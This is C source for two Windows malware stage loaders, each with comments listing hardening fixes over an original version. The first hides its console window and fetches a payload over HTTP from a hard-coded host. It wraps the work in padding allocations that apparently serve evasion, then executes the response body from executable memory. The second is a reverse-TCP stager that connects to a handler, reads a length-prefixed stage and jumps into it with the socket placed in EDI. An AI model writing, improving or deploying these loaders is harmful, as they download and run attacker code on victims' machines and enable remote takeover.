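/*
 * HTTP stage loader.
 *
 * Hides the foreground (console) window, connects with the project's
 * wsconnect() helper, sends a GET for the path returned by checksum() to a
 * hard-coded host, receives the whole response into an RWX buffer and
 * transfers control to the first byte after the HTTP header terminator.
 *
 * The three large allocate-then-copy passes contribute nothing to the
 * request or to the stage; they look like filler/padding (TODO confirm
 * intent). They are kept, but every copy is bounded by the size that was
 * actually allocated (the original used strcpy() into malloc'd buffers).
 *
 * Fixes relative to the original:
 *  - the request is built with snprintf() and checked for truncation: the
 *    fixed text alone is ~150 of the 200 bytes, so a long checksum() value
 *    overflowed request_buf with sprintf();
 *  - the receive loop is bounded by the buffer, leaves a terminating NUL
 *    for strstr(), and aborts on SOCKET_ERROR (-1) instead of adding it
 *    to the write cursor; a response that does not fit is not executed;
 *  - wsconnect(), send(), VirtualAlloc(), malloc() and strstr() results
 *    are checked before use.
 *
 * Note: the User-Agent string has no closing parenthesis; it is reproduced
 * unchanged because it is part of what the server sees.
 *
 * Returns 0 if the stage returns, 1 on any failure. argc/argv are unused.
 * Filler allocations are never freed (as in the original); process exit
 * reclaims them.
 */

enum {
    STAGE_BUF_SIZE = 1000000,  /* RWX buffer for the full HTTP response */
    RECV_CHUNK     = 1024,     /* bytes requested per recv() call */
    FILLER1_COUNT  = 8776, FILLER1_SIZE = 9719,
    FILLER2_COUNT  = 118,  FILLER2_SIZE = 9721,
    FILLER3_COUNT  = 8279, FILLER3_SIZE = 9549
};

/* Allocate count buffers of size bytes into slots[]; a NULL slot is kept
 * and skipped by the copy loops below. */
static void filler_alloc(char **slots, size_t count, size_t size)
{
    size_t i;
    for (i = 0; i < count; ++i) {
        slots[i] = malloc(size);
    }
}

/* Common failure path: release the socket (if any) and winsock. */
static int bail(SOCKET sock)
{
    if (sock != INVALID_SOCKET) {
        closesocket(sock);
    }
    WSACleanup();
    return 1;
}

int main(int argc, char *argv[])
{
    char *filler1[FILLER1_COUNT];
    char *filler2[FILLER2_COUNT];
    char *filler3[FILLER3_COUNT];
    char request_buf[200];
    size_t i;

    (void)argc;
    (void)argv;

    /* Hide the console window the loader was started from. */
    ShowWindow(GetForegroundWindow(), SW_HIDE);

    filler_alloc(filler1, FILLER1_COUNT, FILLER1_SIZE);

    winsock_init();
    SOCKET sock = wsconnect();
    if (sock == INVALID_SOCKET) {
        return bail(sock);
    }

    filler_alloc(filler2, FILLER2_COUNT, FILLER2_SIZE);

    /* Refuse to send a truncated request rather than garbage. */
    int req_len = snprintf(request_buf, sizeof request_buf,
                           "GET /%s HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: 192.168.159.131:8080\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\r\n\r\n",
                           checksum());
    if (req_len < 0 || (size_t)req_len >= sizeof request_buf) {
        return bail(sock);
    }
    if (send(sock, request_buf, req_len, 0) == SOCKET_ERROR) {
        return bail(sock);
    }
    Sleep(300);

    /* MEM_COMMIT pages are zero-filled; the RWX buffer holds headers + stage. */
    char *buffer = VirtualAlloc(0, STAGE_BUF_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL) {
        return bail(sock);
    }

    for (i = 0; i < FILLER1_COUNT; ++i) {
        if (filler1[i] != NULL) {
            snprintf(filler1[i], FILLER1_SIZE, "%s", Name1());
        }
    }

    /* Read until the peer closes (recv() returns 0) or an error occurs.
     * One byte is held back so buffer[total] can be NUL for strstr(). */
    size_t capacity = STAGE_BUF_SIZE - 1;
    size_t total = 0;
    int got = 0;
    while (total < capacity) {
        size_t want = capacity - total;
        if (want > RECV_CHUNK) {
            want = RECV_CHUNK;
        }
        got = recv(sock, buffer + total, (int)want, 0);
        if (got <= 0) {
            break;
        }
        total += (size_t)got;
    }
    if (got == SOCKET_ERROR || total == capacity) {
        /* transfer failed, or the response did not fit: never run a partial stage */
        return bail(sock);
    }
    buffer[total] = '\0';

    filler_alloc(filler3, FILLER3_COUNT, FILLER3_SIZE);
    for (i = 0; i < FILLER2_COUNT; ++i) {
        if (filler2[i] != NULL) {
            snprintf(filler2[i], FILLER2_SIZE, "%s", Name2());
        }
    }

    closesocket(sock);
    WSACleanup();

    /* The stage starts right after the HTTP header terminator. */
    char *body = strstr(buffer, "\r\n\r\n");
    if (body == NULL) {
        return 1;
    }
    ((void (*)(void))(body + 4))();

    for (i = 0; i < FILLER3_COUNT; ++i) {
        if (filler3[i] != NULL) {
            snprintf(filler3[i], FILLER3_SIZE, "%s", Name3());
        }
    }
    return 0;
}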
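/*
 * Reverse-TCP stage loader (x86 stub).
 *
 * Connects to host:port with the project's wsconnect() helper, reads a
 * 4-byte length, then that many bytes of stage into an RWX buffer that is
 * prefixed with the 5-byte stub "mov edi, <socket>" (BF imm32, thanks mihi)
 * so the stage finds its socket in EDI, and jumps to the buffer. Every
 * failure goes through the project's punt() helper, which is assumed not
 * to return (the original relied on that too).
 *
 * Fixes relative to the original:
 *  - the port is parsed with strtol() and range-checked instead of atoi();
 *  - the length and the stage are read with a loop that tolerates short
 *    recv()s; the original single recv() of the length and the unchecked
 *    recv_all() result could both leave a partial stage to be executed;
 *  - "size <= 0" can never be true for a ULONG32; the check is now
 *    size == 0 or size > STAGE_MAX, which also keeps "size + 5" from
 *    wrapping before VirtualAlloc();
 *  - the socket value is copied as an explicit 32-bit quantity: the stub
 *    is 32-bit code and SOCKET is 8 bytes in a 64-bit build, where a
 *    4-byte memcpy of it only took the low half by accident of endianness.
 *
 * Returns 0 if the stage returns; exits via punt()/exit() otherwise.
 */

enum { STAGE_MAX = 64 * 1024 * 1024 };  /* sanity bound on the announced length; adjust if stages grow */

/* recv() exactly len bytes into dst. Returns the number of bytes read,
 * which is less than len only on EOF or socket error. */
static int recv_exact(SOCKET sock, char *dst, int len)
{
    int total = 0;
    while (total < len) {
        int got = recv(sock, dst + total, len - total, 0);
        if (got <= 0) {
            break;
        }
        total += got;
    }
    return total;
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        printf("%s [host] [port]\n", argv[0]);
        exit(1);
    }

    /* Out-of-range values (including strtol overflow) fail the range test. */
    char *end = NULL;
    long port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("%s: invalid port '%s'\n", argv[0], argv[2]);
        exit(1);
    }

    winsock_init();

    /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], (int)port);

    /* read the 4-byte length (host byte order, as sent by the handler) */
    ULONG32 size = 0;
    if (recv_exact(my_socket, (char *)&size, 4) != 4) {
        punt(my_socket, "read a strange or incomplete length value\n");
    }
    if (size == 0 || size > STAGE_MAX) {
        punt(my_socket, "stage length is zero or exceeds the sanity bound\n");
    }

    /* allocate a RWX buffer: 5-byte stub + stage (cannot wrap, size <= STAGE_MAX) */
    char *buffer = VirtualAlloc(0, (SIZE_T)size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL) {
        punt(my_socket, "could not allocate buffer\n");
    }

    /* BF 78 56 34 12 => mov edi, 0x12345678 */
    ULONG32 sock32 = (ULONG32)my_socket;
    buffer[0] = (char)0xBF;
    memcpy(buffer + 1, &sock32, sizeof sock32);

    /* read the stage; refuse to run anything shorter than announced */
    int got = recv_exact(my_socket, buffer + 5, (int)size);
    if ((ULONG32)got != size) {
        punt(my_socket, "incomplete stage\n");
    }

    /* cast the buffer as a function and call it */
    void (*stage)(void) = (void (*)(void))buffer;
    stage();
    return 0;
}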